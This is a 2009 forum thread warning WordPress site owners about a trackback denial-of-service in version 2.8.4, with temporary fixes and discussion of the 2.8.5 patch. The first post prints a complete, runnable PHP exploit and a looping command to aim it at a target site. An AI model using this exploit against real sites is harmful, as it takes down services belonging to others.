wordpress security: *must read* exploit not fixed in 2.8.4

[fris]

Theirs currently an exploit out for 2.8.4 which isnt patched, that will allow someone to exhause your site using a DoS against certain file(s).

Here is the POC (proof of concept)

Code:

<?php
/*
 * wordpress Resource exhaustion Exploit
 * http://rooibo.wordpress.com/
 * [email protected] contacted and get a response,
 * but no solution available.
 * 
 * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <[email protected]>
 * 
 * exploiting:
 * you must install php-cli (command line interface)
 * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
 * 
 */
if(count($argv) < 2)
    die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
    die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
    $path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){
    $fp = @fsockopen($data['host'],80);
        if(!$fp)
        die("unable to connect to: ".$data['host']."\n");
    $pid[$n] = pcntl_fork();
    if(!$pid[$n]){
        fputs($fp, "POST $path HTTP/1.1\r\n");
        fputs($fp, "Host: ".$data['host']."\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: ".strlen($str)."\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $str."\r\n\r\n");
        echo "hit!\n";
    }
}
?>

and Here is the *temp* fix until they patch it

add this to your themes functions.php file

Code:

<?php

// WP Trackback Temp Fix

function ft_stop_trackback_dos_attacks(){
        global $pagenow;
        if ( 'wp-trackback.php' == $pagenow ){
                // DoS attack fix.
                if ( isset($_POST['charset']) ){
                        $charset = $_POST['charset'];
                        if ( strlen($charset) > 50 ) {  die; }
                }
        }
}
add_action('init','ft_stop_trackback_dos_attacks');

?>

[Lace]

Damn, just went and updated all of my sites recently too.

Thanks, Fris.

[Cutty]

Thanks mate, cheerio.

[Ginn]

Thanks for the info. I'll update everything now.

[greg80]

what are you upgrading to? He said exploit still exists in 2.8.4 (current version)

[greg80]

Quote:

Originally Posted by greg80

what are you upgrading to? He said exploit still exists in 2.8.4 (current version)

edit: ok, I read it again. Thanks fris.

[Cyber Fucker]

Thx for the info!

[TheDA]

Thanks. What's the fix for people running an old theme that doesn't have a functions.php? ;)

Can the default functions.php just be copied over to the theme folder? What else needs to be done?

[CYF]

bumping up some good info, thanks fris

[Stephen]

Quote:

Originally Posted by CYF

bumping up some good info, thanks fris

ditto and thanks

[skinnay]

this is no where near the risk of the vulnerability that was recently patched by wordpress.

[fris]

Quote:

Originally Posted by TheDA

Thanks. What's the fix for people running an old theme that doesn't have a functions.php? ;)

Can the default functions.php just be copied over to the theme folder? What else needs to be done?

its currently in the 2.8.4 core, it hasnt been updated yet.

You can add that code to your themes functions.php file which overrides any core functions that you have applied in functions.php

[Nicky]

Thanks man, updating the most important one snow, will wait for new release for the smaller blogs.

[TheSenator]

Shit....this may help some people...Its a plugin

http://fullthrottledevelopment.com/w...ck-dos-attacks


I turned off my trackbacks years ago but I think it is still there to exploit.

[TheDA]

Quote:

Originally Posted by fris

its currently in the 2.8.4 core, it hasnt been updated yet.

You can add that code to your themes functions.php file which overrides any core functions that you have applied in functions.php

What I am saying is, I don't have a functions.php. So, can I just add a copy of the functions.php from the default Kubrick theme to the theme that doesn't have one and then apply this temporary fix to it?

I don't need to do anything else to call the functions.php or anything from any other files?

[Big E]

If you have pingbacks/trackbacks turned off, can you just dev/null it via .htaccess?

<Files wp-trackback.php>
Order Deny,Allow
Deny from all
</Files>

[fris]

Quote:

Originally Posted by TheDA

What I am saying is, I don't have a functions.php. So, can I just add a copy of the functions.php from the default Kubrick theme to the theme that doesn't have one and then apply this temporary fix to it?

I don't need to do anything else to call the functions.php or anything from any other files?

yes you can add it to file called functions.php if you dont have one currently

[TheDA]

Quote:

Originally Posted by fris

yes you can add it to file called functions.php if you dont have one currently

Okay, thanks.

[digifan]

Awesome, thanks guys!

[fatfoo]

Exploit not fixed? Thanks for posting. Interesting read.

[d-null]

thanks for the info...


fuck wordpress is a pain in the ass

[digitaldivas]

...good looking out Fris

[Argos88]

the exploit is FIXED..

the problem you are referring to has to do with some permissions that a user can set. the problem you are referring to, can be more possible on mu if the admin doesn't know how to configure it.

If you are really secure, you should post it in the wp trac and not in GFY. However, again, this was fixed long ago.

[18teens]

Thanks for the info.

[fris]

Quote:

Originally Posted by Argos88

the exploit is FIXED..

the problem you are referring to has to do with some permissions that a user can set. the problem you are referring to, can be more possible on mu if the admin doesn't know how to configure it.

If you are really secure, you should post it in the wp trac and not in GFY. However, again, this was fixed long ago.

this actually hasnt been fixed, i asked one of the core wordpress developers in a chat this morning, their is a fix if you edit a certain file, but if you download 2.8.4 from the site, the issue is not fixed.

[fris]

nevermind 2.8.5 has been released with the fix

[d-null]

Quote:

Originally Posted by fris

nevermind 2.8.5 has been released with the fix

I'm going to wait for 2.8.6 .... at the rate they're going, that should be in another day or so

[TheSenator]

Quote:

Originally Posted by d-null

I'm going to wait for 2.8.6 .... at the rate they're going, that should be in another day or so

Well, I rather keeping upgrading then lose a day worth work fixing exploits. I have too much money invested in my WordPress blogs.

[TheDA]

Quote:

Originally Posted by fris

nevermind 2.8.5 has been released with the fix

Let's see what this version brings